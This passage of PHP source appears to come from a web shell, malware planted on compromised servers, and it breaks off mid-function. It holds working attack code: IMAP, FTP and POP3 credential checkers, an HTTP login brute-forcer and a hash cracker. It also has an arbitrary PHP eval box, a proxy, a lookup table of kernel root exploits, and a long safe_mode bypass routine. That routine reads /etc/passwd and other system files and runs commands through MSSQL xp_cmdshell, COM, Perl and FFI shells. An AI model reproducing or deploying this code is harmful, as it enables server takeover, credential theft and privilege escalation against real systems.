  869. echo "</table></div>$table<tr><td><form method=POST>Find:<input type=text value=\$pass name=search><input type=checkbox name=re value=1 style='border-width:1px;background-color:#333333;'>Regular expressions <input type=submit class=buttons value=Find>$hcwd<input type=hidden value=7 name=task></form></td><td><form method=POST>$hcwd<input type=hidden value='fm' name=seC><select name=task><option value=0>Display files and directories in current folder</option><option value=1>Find writable files and directories in current folder</option><option value=2>Find writable files in current folder</option><option value=3>Find writable directories in current folder</option><option value=4>Display all files in current folder</option><option value=5>Display all directories in current folder</option></select><input type=submit class=buttons value=Do></form>$et</tr></table><table width='100%'><tr><td width='50%'><br><table bgcolor=#333333 border=0 width='65%'><td><b>Summery:</b> Total: $total Directories: $dc Files: $fc Links: $lc$et<table bgcolor=#333333 border=0 width='65%'><td width='100%' bgcolor=";if (is_writeable($cwd)) echo '#006E00';elseif (!is_readable($cwd)) echo '#800000';else '#333333'; echo '>Current directory status: ';if (is_readable($cwd)) echo 'R';if (is_writeable($cwd)) echo 'W' ;echo "$et<table border=0 style='border-collapse: collapse' width='65%'><tr><td width='100%' bgcolor='#333333'>New:</td></tr><tr>$td1n<form method='POST'><input type=text size=47 name=newf></td></tr><tr>$td2m$hcwd<input class=buttons type=submit name=newfile value='File'><input class=buttons type=submit name=newdir value='Folder'></form>$et</td><td width='50%'><br>${t}Upload:</td></tr><tr>$td1n<form method='POST' enctype='multipart/form-data'><input type=file size=45 name=uploadfile></td></tr><tr>$td2m$hcwd<input class=buttons type=submit value=Upload></td></tr>$td1n Note: Max allowed file size to upload on this server is $min</form>$et$et";
  870. }
  871. }
  872. function imapchecK($host,$username,$password,$timeout){
  873. $sock=fsockopen($host,143,$n,$s,$timeout);
  874. $b=uniqid('NJ');
  875. $l=strlen($b);
  876. if(!$sock)return -1;
  877. fread($sock,1024);
  878. fputs($sock,"$b LOGIN $username $password\r\n");
  879. $res=fgets($sock,$l+4);
  880. fclose($sock);
  881. if($res=="$b OK")return 1;else return 0;
  882. }
  883. function ftpchecK($host,$username,$password,$timeout){
  884. $ftp=ftp_connect($host,21,$timeout);
  885. if(!$ftp)return -1;
  886. $con=ftp_login($ftp,$username,$password);
  887. if($con)return 1;else return 0;
  888. }
  889. function pop3checK($server,$user,$pass,$timeout){
  890. $sock=fsockopen($server,110,$en,$es,$timeout);
  891. if(!$sock)return -1;
  892. fread($sock,1024);
  893. fwrite($sock,"user $user\n");
  894. $r=fgets($sock);
  895. if($r{0}=='-')return 0;
  896. fwrite($sock,"pass $pass\n");
  897. $r=fgets($sock);
  898. fclose($sock);
  899. if($r{0}=='+')return 1;
  900. return 0;
  901. }
  902. function formcrackeR(){
  903. global $errorbox,$footer,$et,$hcwd;
  904. if(!empty($_REQUEST['start'])){
  905. if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else $log=0;
  906. $url=$_REQUEST['target'];
  907. $uf=$_REQUEST['userf'];
  908. $pf=$_REQUEST['passf'];
  909. $sf=$_REQUEST['submitf'];
  910. $sv=$_REQUEST['submitv'];
  911. $method=$_REQUEST['method'];
  912. $fail=$_REQUEST['fail'];
  913. $dic=$_REQUEST['dictionary'];
  914. $type=$_REQUEST['combo'];
  915. $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:'';
  916. if(!file_exists($dic))die("$errorbox Can not open dictionary.$et$footer");
  917. $dictionary=fopen($dic,'r');
  918. echo '<font color=blue>Cracking started...<br>';
  919. while(!feof($dictionary)){
  920. if($type){
  921. $combo=trim(fgets($dictionary)," \n\r");
  922. $user=substr($combo,0,strpos($combo,':'));
  923. $pass=substr($combo,strpos($combo,':')+1);
  924. }else{
  925. $pass=trim(fgets($dictionary)," \n\r");
  926. }
  927. $url.="?$uf=$user&$pf=$pass&$sf=$sv";
  928. $res=check_urL($url,$method,$fail,12);
  929. if(!$res){echo "<font color=blue>U: $user P: $pass</font><br>";if($log)file_add_contentS($file,"U: $user P: $pass\r\n");if(!$type)break;}
  930. }
  931. fclose($dictionary);
  932. echo 'Done!</font><br>';
  933. }
  934. else echo "<center><table border=0 style='border-collapse: collapse' width='434'><tr><td width='174' bgcolor='#333333'>HTTP Form cracker:</td><td bgcolor='#333333' width='253'></td></tr><form method='POST' name=form><tr><td width='174' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666' width='253'><input type=text name=dictionary size=35></td></tr><tr><td width='174' bgcolor='#808080'>Dictionary type:</td><td bgcolor='#808080'><input type=radio name=combo checked value=0 onClick='document.form.user.disabled = false;' style='border-width:1px;background-color:#808080;'>Simple (P)<input type=radio value=1 name=combo onClick='document.form.user.disabled = true;' style='border-width:1px;background-color:#808080;'>Combo (U:P)</td></tr><tr><td width='174' bgcolor='#666666'>Username:</td><td bgcolor='#666666'><input type=text size=35 value=root name=user>$hcwd</td></tr><tr><td width='174' bgcolor='#808080'>Action Page:</td><td bgcolor='#808080' width='253'><input type=text name=target value='http://".getenv('HTTP_HOST')."/login.php' size=35></td></tr><tr><td width='174' bgcolor='#666666'>Method:</td><td bgcolor='#666666' width='253'><select size='1' name='method'><option selected value='POST'>POST</option><option value='GET'>GET</option></select></td></tr><tr><td width='174' bgcolor='#808080'>Username field name:</td><td bgcolor='#808080' width='253'><input type=text name=userf value=user size=35></td></tr><tr><td width='174' bgcolor='#666666'>Password field name:</td><td bgcolor='#666666' width='253'><input type=text name=passf value=passwd size=35></td></tr><tr><td width='174' bgcolor='#808080'>Submit name:</td><td bgcolor='#808080' width='253'><input type=text value=login name=submitf size=35></td></tr><tr><td width='174' bgcolor='#666666'>Submit value:</td><td bgcolor='#666666' width='253'><input type=text value='Login' name=submitv size=35></td></tr><tr><td width='174' bgcolor='#808080'>Fail string:</td><td bgcolor='#808080' width='253'><input type=text name=fail value='Try again' size=35></td></tr><tr><td width='174' bgcolor='#666666'><input type=checkbox name=loG value=1 onClick='document.form.logfilE.disabled = !document.form.logfilE.disabled;' style='border-width:1px;background-color:#666666;' checked>Log</td><td bgcolor='#666666'><input type=text name=logfilE size=25 value='".whereistmP().DIRECTORY_SEPARATOR.".log'> <input class=buttons type=submit name=start value=Start></form>$et</center>";
  935. }
  936. function hashcrackeR(){
  937. global $errorbox,$t,$et,$hcwd;
  938. if(!empty($_REQUEST['hash']) && !empty($_REQUEST['dictionary']) && !empty($_REQUEST['type'])){
  939. if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else $log=0;
  940. $dictionary=fopen($_REQUEST['dictionary'],'r');
  941. if($dictionary){
  942. $hash=strtoupper($_REQUEST['hash']);
  943. echo '<font color=blue>Cracking '.htmlspecialchars($hash).'...<br>';
  944. $type=($_REQUEST['type']=='MD5')?'md5':'sha1';
  945. while(!feof($dictionary)){
  946. $word=trim(fgets($dictionary)," \n\r");
  947. if($hash==strtoupper(($type($word)))){echo "The answer is $word<br>";if($log)file_add_contentS($file,"$x\r\n");break;}
  948. }
  949. echo 'Done!</font>';
  950. fclose($dictionary);
  951. }
  952. else{
  953. echo "$errorbox Can not open dictionary.$et";
  954. }
  955. }
  956. echo "<center>${t}Hash cracker:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666'><input type=text name=dictionary size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Hash:</td><td bgcolor='#808080'><input type=text name=hash size=35></td></tr><tr><td width='20%' bgcolor='#666666'>Type:</td><td bgcolor='#666666'><select name=type><option selected value=MD5>MD5</option><option value=SHA1>SHA1</option></select></td></tr><tr><td width='20%' bgcolor='#808080'><input type=checkbox name=loG value=1 onClick='document.form.logfilE.disabled = !document.form.logfilE.disabled;' style='border-width:1px;background-color:#808080;' checked>Log</td><td bgcolor='#808080'><input type=text name=logfilE size=25 value='".whereistmP().DIRECTORY_SEPARATOR.".log'> $hcwd <input class=buttons type=submit value=Start></form>$et</center>";
  957. }
  958. function pr0xy(){
  959. global $errorbox,$et,$footer,$hcwd;
  960. echo "<table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='100%'><form method='POST'><tr><td width='20%'><b>Navigator: </b><input type=text name=urL size=140 value='";if(!!empty($_REQUEST['urL'])) echo 'http://www.edpsciences.org/htbin/ipaddress'; else echo htmlspecialchars($_REQUEST['urL']);echo "'>$hcwd<input type=submit class=buttons value=Go></form>$et";
  961. if(!empty($_REQUEST['urL'])){
  962. $u=parse_url($_REQUEST['urL']);
  963. $host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';
  964. $dir=dirname($file);
  965. $con=getiT($_REQUEST['urL']);
  966. $s=array("href=mailto"=>"HrEf=mailto","HREF=mailto"=>"HrEf=mailto","href='mailto"=>"HrEf=\"mailto","HREF=\"mailto"=>"HrEf=\"mailto","href=\'mailto"=>"HrEf=\"mailto","HREF=\'mailto"=>"HrEf=\"mailto","href=\"http"=>"HrEf=\"".hlinK("seC=px&urL=http"),"href=\'http"=>"HrEf=\"".hlinK("seC=px&urL=http"),"HREF=\'http"=>"HrEf=\"".hlinK("seC=px&urL=http"),"href=http"=>"HrEf=".hlinK("seC=px&urL=http"),"HREF=http"=>"HrEf=".hlinK("seC=px&urL=http"),"href=\""=>"HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),"HREF=\""=>"HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),"href=\""=>"HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),'HREF="'=>'HrEf="'.hlinK("seC=px&urL=http://$host/$dir/"),"href="=>"HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),"HREF="=>"HrEf=".hlinK("seC=px&urL=http://$host/$dir/"));
  967. $con=replace_stR($s,$con);
  968. echo $con;
  969. }
  970. }
  971. function sqlclienT(){
  972. global $t,$errorbox,$et,$hcwd;
  973. if(!empty($_REQUEST['serveR']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS']) && !empty($_REQUEST['querY'])){
  974. $server=$_REQUEST['serveR'];$type=$_REQUEST['typE'];$pass=$_REQUEST['pasS'];$user=$_REQUEST['useR'];$query=$_REQUEST['querY'];
  975. $db=(empty($_REQUEST['dB']))?'':$_REQUEST['dB'];
  976. $res=querY($type,$server,$user,$pass,$db,$query);
  977. if($res){
  978. $res=str_replace('|-|-|-|-|-|','</td><td>',$res);
  979. $res=str_replace('|+|+|+|+|+|','</td></tr><tr><td>',$res);
  980. $r=explode('[+][+][+]',$res);
  981. $r[1]=str_replace('[-][-][-]',"</td><td bgcolor='333333'>",$r[1]);
  982. echo "<table border=0 bgcolor='666666' width='100%'></tr><tr><td bgcolor='333333'>".$r[1].'</tr><tr><td>'.$r[0]."$et<br>";
  983. }
  984. else{
  985. echo "$errorbox Failed!$et<br>";
  986. }
  987. }
  988. if(empty($_REQUEST['typE']))$_REQUEST['typE']='';
  989. echo "<center>${t}SQL cilent:</td><form name=client method='POST'><td bgcolor='#333333'><select name=typE><option valut=MySQL onClick='document.client.serveR.disabled = false;' ";if ($_REQUEST['typE']=='MySQL')echo 'selected';echo ">MySQL</option><option valut=MSSQL onClick='document.client.serveR.disabled = false;' ";if ($_REQUEST['typE']=='MSSQL')echo 'selected';echo ">MSSQL</option><option valut=Oracle onClick='document.client.serveR.disabled = true;' ";if ($_REQUEST['typE']=='Oracle')echo 'selected';echo ">Oracle</option><option valut=PostgreSQL onClick='document.client.serveR.disabled = false;' ";if ($_REQUEST['typE']=='PostgreSQL')echo 'selected';echo ">PostgreSQL</option></select></td></tr><tr><td width='20%' bgcolor='#666666'>Server:</td><td bgcolor='#666666'><input type=text value='";if (!empty($_REQUEST['serveR'])) echo htmlspecialchars($_REQUEST['serveR']);else echo 'localhost'; echo "' name=serveR size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Username:</td><td bgcolor='#808080'><input type=text name=useR value='";if (!empty($_REQUEST['useR'])) echo htmlspecialchars($_REQUEST['useR']);else echo 'root'; echo "' size=35></td><tr><td width='20%' bgcolor='#666666'>Password:</td><td bgcolor='#666666'><input type=text value='";if (isset($_REQUEST['pasS'])) echo htmlspecialchars($_REQUEST['pasS']);else echo '123456'; echo "' name=pasS size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Database:</td><td bgcolor='#808080'><input type=text value='";if (!empty($_REQUEST['dB'])) echo htmlspecialchars($_REQUEST['dB']); echo "' name=dB size=35></td><tr><td width='20%' bgcolor='#666666'>Query:</td><td bgcolor='#666666'><textarea name=querY rows=5 cols=27>";if (!empty($_REQUEST['querY'])) echo htmlspecialchars(($_REQUEST['querY']));else echo 'SHOW DATABASES'; echo "</textarea></td></tr></tr><tr><td width='20%' bgcolor='#808080'></td><td bgcolor='#808080' align=right>$hcwd<input class=buttons type=submit value='Submit Query'></form>$et</center>";
  990. }
  991. function querY($type,$host,$user,$pass,$db='',$query){
  992. $res='';
  993. switch($type){
  994. case 'MySQL':
  995. if(!function_exists('mysql_connect'))return 0;
  996. $link=mysql_connect($host,$user,$pass);
  997. if($link){
  998. if(!empty($db))mysql_select_db($db,$link);
  999. $result=mysql_query($query,$link);
  1000. while($data=mysql_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
  1001. $res.='[+][+][+]';
  1002. for($i=0;$i<mysql_num_fields($result);$i++)
  1003. $res.=mysql_field_name($result,$i).'[-][-][-]';
  1004. mysql_close($link);
  1005. return $res;
  1006. }
  1007. break;
  1008. case 'MSSQL':
  1009. if(!function_exists('mssql_connect'))return 0;
  1010. $link=mssql_connect($host,$user,$pass);
  1011. if($link){
  1012. if(!empty($db))mssql_select_db($db,$link);
  1013. $result=mssql_query($query,$link);
  1014. while($data=mssql_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
  1015. $res.='[+][+][+]';
  1016. for($i=0;$i<mssql_num_fields($result);$i++)
  1017. $res.=mssql_field_name($result,$i).'[-][-][-]';
  1018. mssql_close($link);
  1019. return $res;
  1020. }
  1021. break;
  1022. case 'Oracle':
  1023. if(!function_exists('ocilogon'))return 0;
  1024. $link=ocilogon($user,$pass,$db);
  1025. if($link){
  1026. $stm=ociparse($link,$query);
  1027. ociexecute($stm,OCI_DEFAULT);
  1028. while($data=ocifetchinto($stm,$data,OCI_ASSOC+OCI_RETURN_NULLS))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
  1029. $res.='[+][+][+]';
  1030. for($i=0;$i<oci_num_fields($stm);$i++)
  1031. $res.=oci_field_name($stm,$i).'[-][-][-]';
  1032. return $res;
  1033. }
  1034. break;
  1035. case 'PostgreSQL':
  1036. if(!function_exists('pg_connect'))return 0;
  1037. $link=pg_connect("host=$host dbname=$db user=$user password=$pass");
  1038. if($link){
  1039. $result=pg_query($link,$query);
  1040. while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
  1041. $res.='[+][+][+]';
  1042. for($i=0;$i<pg_num_fields($result);$i++)
  1043. $res.=pg_field_name($result,$i).'[-][-][-]';
  1044. pg_close($link);
  1045. return $res;
  1046. }
  1047. break;
  1048. }
  1049. return 0;
  1050. }
  1051. function phpevaL(){
  1052. global $t,$hcwd,$et;
  1053. echo '<center>';
  1054. if(!empty($_REQUEST['code'])){
  1055. $s=array('<?php'=>'','<?'=>'','?>'=>'');
  1056. echo "<textarea rows='10' cols='64'>";echo htmlspecialchars(eval(replace_stR($s,$_REQUEST['code'])));echo '</textarea><br><br>';
  1057. }
  1058. echo "${t}Evaler:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>Codes:</td><td bgcolor='#666666'><textarea rows='10' name='code' cols='64'>";if(!empty($_REQUEST['code']))echo htmlspecialchars($_REQUEST['code']);echo "</textarea></td></tr><tr><td width='20%' bgcolor='#666666'></td><td bgcolor='#666666' align=right>$hcwd<input class=buttons type=submit value=Execute></form>$et</center>";
  1059. }
  1060. function rootxpL(){
  1061. $v=php_uname();
  1062. $db=array('2.6.17'=>'prctl3, raptor_prctl, py2','2.6.16'=>'raptor_prctl, exp.sh, raptor, raptor2, h00lyshit','2.6.15'=>'py2, exp.sh, raptor, raptor2, h00lyshit','2.6.14'=>'raptor, raptor2, h00lyshit','2.6.13'=>'kdump, local26, py2, raptor_prctl, exp.sh, prctl3, h00lyshit','2.6.12'=>'h00lyshit','2.6.11'=>'krad3, krad, h00lyshit','2.6.10'=>'h00lyshit, stackgrow2, uselib24, exp.sh, krad, krad2','2.6.9'=>'exp.sh, krad3, py2, prctl3, h00lyshit','2.6.8'=>'h00lyshit, krad, krad2','2.6.7'=>'h00lyshit, krad, krad2','2.6.6'=>'h00lyshit, krad, krad2','2.6.2'=>'h00lyshit, krad, mremap_pte','2.6.'=>'prctl, kmdx, newsmp, pwned, ptrace_kmod, ong_bak','2.4.29'=>'elflbl, expand_stack, stackgrow2, uselib24, smpracer','2.4.27'=>'elfdump, uselib24','2.4.25'=>'uselib24','2.4.24'=>'mremap_pte, loko, uselib24','2.4.23'=>'mremap_pte, loko, uselib24','2.4.22'=>'loginx, brk, km2, loko, ptrace, uselib24, brk2, ptrace-kmod','2.4.21'=>'w00t, brk, uselib24, loginx, brk2, ptrace-kmod','2.4.20'=>'mremap_pte, w00t, brk, ave, uselib24, loginx, ptrace-kmod, ptrace, kmod','2.4.19'=>'newlocal, w00t, ave, uselib24, loginx, kmod','2.4.18'=>'km2, w00t, uselib24, loginx, kmod','2.4.17'=>'newlocal, w00t, uselib24, loginx, kmod','2.4.16'=>'w00t, uselib24, loginx','2.4.10'=>'w00t, brk, uselib24, loginx','2.4.9'=>'ptrace24, uselib24','2.4.'=>'kmdx, remap, pwned, ptrace_kmod, ong_bak','2.2.25'=>'mremap_pte','2.2.24'=>'ptrace','2.2.'=>'rip, ptrace');
  1063. foreach($db as $k=>$x)if(strstr($v,$k))return $x;
  1064. return 0;
  1065. }
  1066. function toolS(){
  1067. global $t,$hcwd,$et,$cwd;
  1068. if(!empty($_REQUEST['serveR']) && !empty($_REQUEST['domaiN'])){
  1069. $ser=fsockopen($_REQUEST['serveR'],43,$en,$es,5);
  1070. fputs($ser,$_REQUEST['domaiN']."\r\n");
  1071. echo '<pre>';
  1072. while(!feof($ser))echo fgets($ser,1024);
  1073. echo '</pre>';
  1074. fclose($ser);
  1075. }
  1076. elseif(!empty($_REQUEST['urL'])){
  1077. $h='';
  1078. $u=parse_url($_REQUEST['urL']);
  1079. $host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';$port=(empty($u['port']))?80:$u['port'];
  1080. $ser=fsockopen($host,$port,$en,$es,5);
  1081. if($ser){
  1082. fputs($ser,"GET $file\r\nHost: $host\r\n\r\n");
  1083. echo '<pre>';
  1084. while($h!="\r\n"){$h=fgets($ser,1024);echo $h;}
  1085. echo '</pre>';
  1086. fclose($ser);
  1087. }
  1088. }
  1089. elseif(!empty($_REQUEST['ouT']) && isset($_REQUEST['pW'])&& !empty($_REQUEST['uN'])){
  1090. $htpasswd=$_REQUEST['ouT'].DIRECTORY_SEPARATOR.'.htpasswd';
  1091. $htaccess=$_REQUEST['ouT'].DIRECTORY_SEPARATOR.'.htaccess';
  1092. file_put_contents($htpasswd,$_REQUEST['uN'].':'.crypt(trim($_REQUEST['pW']),CRYPT_STD_DES));
  1093. file_put_contents($htaccess,"AuthName \"Secure\"\r\nAuthType Basic\r\nAuthUserFile $htpasswd\r\nRequire valid-user\r\n");
  1094. echo '<font color=blue>Done</font>';
  1095. }
  1096. $s="</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>";
  1097. echo "<center>${t}WhoIs:${s}Server:</td><td bgcolor='#666666'><input type=text value='";if (!empty($_REQUEST['serveR'])) echo htmlspecialchars($_REQUEST['serveR']);else echo 'whois.geektools.com'; echo "' name=serveR size=35></td></tr><tr><td width='20%' bgcolor='#808080'>domain:</td><td bgcolor='#808080'><input type=text name=domaiN value='";if (!empty($_REQUEST['domaiN'])) echo htmlspecialchars($_REQUEST['domaiN']); else echo 'google.com'; echo "' size=35></td><tr><td bgcolor='#666666'></td><td bgcolor='#666666' align=right>$hcwd<input class=buttons type=submit value='Do'></form>$et<br>${t}.ht* generator:${s}Username:</td><td bgcolor='#666666'><input type=text value='";if (!empty($_REQUEST['uN'])) echo htmlspecialchars($_REQUEST['uN']);else echo 'r00t'; echo "' name=uN size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Password:</td><td bgcolor='#808080'><input type=text name=pW value='";if (!empty($_REQUEST['pW'])) echo htmlspecialchars($_REQUEST['pW']); else echo uniqid('@'); echo "' size=35></td><tr><td width='20%' bgcolor='#666666'>Directory:</td><td bgcolor='#666666'><input type=text name=ouT value='";if (!empty($_REQUEST['ouT'])) echo htmlspecialchars($_REQUEST['ouT']); else echo $cwd; echo "' size=35></td><tr><td bgcolor='#808080'></td><td bgcolor='#808080' align=right>$hcwd<input class=buttons type=submit value=Make></form>$et<br>${t}Grab header:${s}URL:</td><td bgcolor='#666666'><input type=text value='";if (!empty($_REQUEST['urL']))echo htmlspecialchars($_REQUEST['urL']);else echo 'http://netjackal.by.ru/index.htm'; echo "' name=urL size=35></td></tr><tr><td bgcolor='#808080'></td><td bgcolor='#808080' align=right>$hcwd<input class=buttons type=submit value='Get'></form>$et<br></center>";
  1098. }
  1099. function hexvieW(){
  1100. if(!empty($_REQUEST['filE'])){
  1101. $f=$_REQUEST['filE'];
  1102. echo "<table border=0 style='border-collapse: collapse' width='100%'><td width='10%' bgcolor='#282828'>Offset</td><td width='25%' bgcolor='#282828'>Hex</td><td width='25%' bgcolor='#282828'></td><td width='40%' bgcolor='#282828'>ASCII</td></tr>";
  1103. $file=fopen($f,'r');
  1104. $i=-1;
  1105. while(!feof($file)){
  1106. $ln='';
  1107. $i++;
  1108. echo "<tr><td width='10%' bgcolor='#";
  1109. if($i % 2==0)echo '666666';else echo '808080';
  1110. echo "'>";echo str_repeat('0',(8-strlen($i*16))).$i*16;echo '</td>';
  1111. echo "<td width='25%' bgcolor='#";
  1112. if($i % 2==0)echo '666666';else echo '808080';
  1113. echo "'>";
  1114. for($j=0;$j<=7;$j++){
  1115. if(!feof($file)){
  1116. $tmp=strtoupper(dechex(ord(fgetc($file))));
  1117. if(strlen($tmp)==1)$tmp='0'.$tmp;
  1118. echo $tmp.' ';
  1119. $ln.=$tmp;
  1120. }
  1121. }
  1122. echo "</td><td width='25%' bgcolor='#";
  1123. if($i % 2==0)echo '666666';else echo '808080';
  1124. echo "'>";
  1125. for($j=7;$j<=14;$j++){
  1126. if(!feof($file)){
  1127. $tmp=strtoupper(dechex(ord(fgetc($file))));
  1128. if(strlen($tmp)==1)$tmp='0'.$tmp;
  1129. echo $tmp.' ';
  1130. $ln.=$tmp;
  1131. }
  1132. }
  1133. echo "</td><td width='40%' bgcolor='#";
  1134. if($i % 2==0)echo '666666';else echo '808080';
  1135. echo "'>";
  1136. $n=0;$asc='';$co=0;
  1137. for($k=0;$k<=16;$k++){
  1138. $co=hexdec(substr($ln,$n,2));
  1139. if(($co<=31)||(($co>=127)&&($co<=160)))$co=46;
  1140. $asc.=chr($co);
  1141. $n+=2;
  1142. }
  1143. echo htmlspecialchars($asc);
  1144. echo '</td></tr>';
  1145. }
  1146. }
  1147. fclose($file);
  1148. echo '</table>';
  1149. }
  1150. function safemodE(){
  1151. global $windows,$t,$hcwd,$et;
  1152. $file=(empty($_REQUEST['file']))?'/etc/passwd':$_REQUEST['file'];
  1153. $pr="\r\n</font><font color=green>Method ";
  1154. $po=")</font><font color=blue>\r\n";
  1155. $i=1;
  1156. if(!empty($_REQUEST['read'])){
  1157. echo "<pre>$pr$i:(ini_restore$po";
  1158. ini_restore('safe_mode');ini_restore('open_basedir');
  1159. readfile($file);
  1160. $i++;
  1161. echo "$pr$i:(include$po";
  1162. include($file);
  1163. $i++;
  1164. echo "$pr$i:(copy$po";
  1165. $tmp=tempnam('','cx');
  1166. copy('compress.zlib://'.$file,$tmp);
  1167. $fh=fopen($tmp,'r');
  1168. $data=fread($fh,filesize($tmp));
  1169. fclose($fh);
  1170. echo $data;
  1171. $i++;
  1172. if(function_exists('mb_send_mail')){
  1173. echo "$pr$i:(mb_send_mail$po";
  1174. if(file_exists('/tmp/mb_send_mail'))unlink('/tmp/mb_send_mail');
  1175. mb_send_mail(NULL, NULL, NULL, NULL,'-C $file -X /tmp/mb_send_mail');
  1176. readfile('/tmp/mb_send_mail');
  1177. $i++;
  1178. }
  1179. if(function_exists('curl_init')){
  1180. echo "$pr$i:(curl_init [A]$po";
  1181. $fh=curl_init('file://'.$file.'');
  1182. $tmp=curl_exec($fh);
  1183. echo $tmp;
  1184. $i++;
  1185. echo "$pr$i:(curl_init [B]$po";
  1186. $i++;
  1187. if(strstr($file,DIRECTORY_SEPARATOR))$ch=curl_init('file:///'.$file."\x00/../../../../../../../../../../../../".__FILE__);
  1188. else $ch=curl_init('file://'.$file."\x00".__FILE__);
  1189. var_dump(curl_exec($ch));
  1190. }
  1191. if(is_writable('.')){
  1192. echo "$pr$i:(php.ini$po";
  1193. file_put_contents('php.ini','safe_mode = Off');
  1194. readfile($file);
  1195. unlink('php.ini');
  1196. $i++;
  1197. }
  1198. if(extension_loaded('perl')){
  1199. echo "$pr$i:(perl$po";
  1200. echo perlshelL("type \"$file\"");
  1201. $i++;
  1202. }
  1203. if(is_object($ws=new COM('WScript.Shell'))){
  1204. echo "$pr$i:(COM$po";
  1205. echo comshelL("type \"$file\"",$ws);
  1206. $i++;
  1207. }
  1208. if(extension_loaded('ffi') && $windows){
  1209. echo "$pr$i:(FFI$po";
  1210. echo ffishelL("type \"$file\"");
  1211. $i++;
  1212. }
  1213. if(checkfunctioN('win_shell_execute')){
  1214. echo "$pr$i:(win32std$po";
  1215. echo winshelL("type \"$file\"");
  1216. $i++;
  1217. }
  1218. if(checkfunctioN('win32_create_service')){
  1219. echo "$pr$i:(win32service$po";
  1220. echo srvshelL("type \"$file\"");
  1221. $i++;
  1222. }
  1223. if(function_exists('imap_open')){
  1224. echo "$pr$i:(imap [A]$po";
  1225. $str=imap_open('/etc/passwd','','');
  1226. $list=imap_list($str,$file,'*');
  1227. for($i=0;$i<count($list);$i++)echo $list[$i]."\n";
  1228. imap_close($str);
  1229. $i++;
  1230. echo "$pr$i:(imap [B]$po";
  1231. $str=imap_open($file,'','');
  1232. $tmp=imap_body($str,1);
  1233. echo $tmp;
  1234. imap_close($str);
  1235. $i++;
  1236. }
  1237. if($file=='/etc/passwd'){
  1238. echo "$pr$i:(posix$po";
  1239. for($uid=0;$uid<99999;$uid++){
  1240. $h=posix_getpwuid($uid);
  1241. if(!empty($h))foreach($h as $v)echo "$v:";
  1242. echo "\r\n";
  1243. }
  1244. }
  1245. echo "\n</pre></font>";
  1246. }
  1247. elseif(!empty($_REQUEST['show'])){
  1248. echo "<pre>$pr$i:(glob$po";
  1249. $con=glob("$file*");
  1250. foreach ($con as $v)echo "$v\n";
  1251. $i++;
  1252. if(function_exists('imap_open')){
  1253. echo "$pr$i:(imap$po";
  1254. $str=imap_open('/etc/passwd','','');
  1255. $s=explode("|",$file);
  1256. if(count($s)>1)$list=imap_list($str,trim($s[0]),trim($s[1]));else $list=imap_list($str,trim($str[0]),'*');
  1257. for($i=0;$i<count($list);$i++)echo "$list[$i]\r\n";
  1258. imap_close($str);
  1259. $i++;
  1260. }
  1261. if(is_object($ws=new COM('WScript.Shell'))){
  1262. echo "$pr$i:(COM$po";
  1263. $exec=comshelL("dir \"$file\"",$ws);
  1264. $exec=str_replace("\t",'',$exec);
  1265. echo $exec;
  1266. $i++;
  1267. }
  1268. if(checkfunctioN('win_shell_execute')){
  1269. echo "$pr$i:(win32std$po";
  1270. echo winshelL("dir \"$file\"");
  1271. $i++;
  1272. }
  1273. if(checkfunctioN('win32_create_service')){
  1274. echo "$pr$i:(win32service$po";
  1275. echo srvshelL("dir \"$file\"");
  1276. $i++;
  1277. }
  1278. echo "\n</pre></font>";
  1279. }
  1280. elseif(!empty($_REQUEST['sql'])){
  1281. $ta=uniqid('N');
  1282. $s=array("CREATE TEMPORARY TABLE $ta (file LONGBLOB)","LOAD DATA INFILE '".addslashes($_REQUEST['file'])."' INTO TABLE $ta","SELECT * FROM $ta");
  1283. $l=mysql_connect('localhost', $_REQUEST['user'], $_REQUEST['pass']);
  1284. mysql_select_db($_REQUEST['db'],$l);
  1285. echo '<pre><font color=blue>';
  1286. foreach($s as $v){
  1287. $q = mysql_query($v,$l);
  1288. while($d=mysql_fetch_row($q))echo htmlspecialchars($d[0]);
  1289. }
  1290. echo '</pre></font>';
  1291. }
  1292. elseif(!empty($_REQUEST['serveR']) && !empty($_REQUEST['coM']) && !empty($_REQUEST['dB']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS'])){
  1293. $res='';
  1294. $tb=uniqid('NJ');
  1295. $db=mssql_connect($_REQUEST['serveR'],$_REQUEST['useR'],$_REQUEST['pasS']);
  1296. mssql_select_db($_REQUEST['dB'],$db);
  1297. mssql_query("create table $tb ( string VARCHAR (500) NULL)",$db);
  1298. mssql_query("insert into $tb EXEC master.dbo.xp_cmdshell '".$_REQUEST['coM']."'",$db);
  1299. $re=mssql_query("select * from $tb",$db);
  1300. while(($row=mssql_fetch_row($re)))
  1301. {
  1302. $res.= $row[0]."\r\n";
  1303. }
  1304. mssql_query("drop table $tb",$db);
  1305. mssql_close($db);
  1306. echo "<center><textarea rows='18' cols='64'>$res</textarea></center><br>";
  1307. }
  1308. $f=(!empty($_REQUEST['file']))?htmlspecialchars($_REQUEST['file']):'/etc/passwd';
  1309. $u=(!empty($_REQUEST['user']))?htmlspecialchars($_REQUEST['user']):'root';
